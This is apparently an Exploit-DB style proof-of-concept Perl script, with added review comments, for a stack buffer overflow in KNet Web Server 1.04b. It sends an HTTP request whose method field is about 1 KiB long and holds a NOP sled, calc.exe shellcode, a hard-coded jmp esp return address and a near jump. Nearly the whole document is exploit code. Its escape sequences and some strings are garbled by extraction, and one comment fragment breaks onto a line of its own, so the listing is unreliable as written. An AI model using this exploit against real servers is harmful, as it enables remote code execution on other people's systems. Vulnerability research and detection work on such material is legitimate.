
# Title : KNet Web Server 1.04b - Stack Corruption BoF
# Published : 2013-04-12
# Author :


#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3

use IO::Socket::INET;
# Target host and port are taken straight from @ARGV with no validation.
# The script has no `use strict; use warnings;`, so $host, $port, $sock,
# $shellcode and $payload are all package globals.
$host = shift;
$port = shift;
# NOTE(review): several string literals below look garbled by text
# extraction and are kept here exactly as found in the listing.
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.comn";
die "Usage $0 <host> <port>n" unless $host && $port;
# One TCP connection to the target; the single "$host:$port" argument is
# the PeerAddr shorthand form of IO::Socket::INET->new.
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$portn";

# Shellcode for calc.exe
# Per the author's comment this is a calc.exe-spawning payload. The rest
# of the script treats it as an opaque byte string whose only relevant
# property is its length (used below to compute the padding).
$shellcode=
"x89xe2xdaxd5xd9x72xf4x5dx55x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x6bx4cx78x68x4ex69x45x50x73x30" .
"x63x30x61x70x6ex69x78x65x75x61x39x42x62x44" .
"x6cx4bx51x42x34x70x4ex6bx72x72x46x6cx4ex6b" .
"x71x42x37x64x4ex6bx44x32x36x48x54x4fx4ex57" .
"x53x7ax35x76x76x51x39x6fx44x71x4bx70x4ex4c" .
"x77x4cx35x31x73x4cx47x72x64x6cx67x50x4ax61" .
"x78x4fx54x4dx33x31x68x47x49x72x6ax50x73x62" .
"x63x67x6cx4bx52x72x66x70x6ex6bx53x72x77x4c" .
"x63x31x48x50x6ex6bx73x70x64x38x6ex65x69x50" .
"x52x54x50x4ax65x51x48x50x56x30x4cx4bx70x48" .
"x47x68x4cx4bx42x78x37x50x66x61x78x53x39x73" .
"x77x4cx57x39x4cx4bx75x64x4cx4bx77x71x38x56" .
"x70x31x59x6fx76x51x39x50x6cx6cx6fx31x6ax6f" .
"x34x4dx53x31x78x47x45x68x79x70x42x55x6bx44" .
"x77x73x61x6dx59x68x47x4bx51x6dx34x64x62x55" .
"x4dx32x31x48x4cx4bx71x48x47x54x37x71x4ex33" .
"x43x56x4ex6bx76x6cx32x6bx6cx4bx70x58x57x6c" .
"x36x61x79x43x6ex6bx73x34x6ex6bx33x31x4ax70" .
"x4bx39x73x74x34x64x54x64x63x6bx31x4bx65x31" .
"x33x69x72x7ax70x51x39x6fx69x70x70x58x31x4f" .
"x52x7ax6cx4bx36x72x58x6bx6bx36x73x6dx63x5a" .
"x55x51x4cx4dx6bx35x6cx79x35x50x63x30x65x50" .
"x66x30x35x38x46x51x6ex6bx50x6fx4cx47x79x6f" .
"x6ex35x4dx6bx5ax50x68x35x6fx52x62x76x42x48" .
"x6fx56x6dx45x4fx4dx6fx6dx4bx4fx7ax75x75x6c" .
"x66x66x31x6cx74x4ax6fx70x79x6bx4bx50x52x55" .
"x53x35x6dx6bx50x47x36x73x42x52x52x4fx72x4a" .
"x45x50x72x73x6bx4fx6bx65x30x63x33x51x52x4c" .
"x50x63x64x6ex51x75x42x58x45x35x57x70x41x41";

# Padding is sized so that padding + shellcode comes to exactly 1003
# bytes; that fixed offset (per the author's comments) is what reaches the
# saved return address on the tested build.
$dist=1003-length($shellcode);
$payload = "x90"x$dist; # Distance to overwrite EIP
$payload.=$shellcode;
$payload.="x90" x 8; #Spacer between EIP and shellcode
# Hard-coded address the author labels "jmp esp". It is tied to the
# tested environment named in the header (WinXP SP3) rather than generic.
$payload.= "x53x93x42x7e"; #Overwrite EIP with jmp esp
# NOTE(review): the trailing comment on the next statement was wrapped by
# extraction; the fragment "Near jmp-300" ends up on a line of its own and
# is not a comment as listed.
$payload.="x90x90x90x90xE9xF4xFCxFFxFF"; #stack padding + BP +
Near jmp-300
# The whole buffer occupies the position of the HTTP method token, so the
# intended wire request is about 1024 bytes (1003 + 8 + 4 + 9) of
# non-method bytes followed by " / HTTP/1.0" and the header terminator.
# For detection, a request line whose method field is roughly 1 KiB long
# is the shape this PoC produces. No fixed version is given on this page.
$payload.=" / HTTP/1.0rnrn"; # Needs to be a valid HTTP request

# Fire-and-forget: the request is written once and no response is read.
print $sock $payload;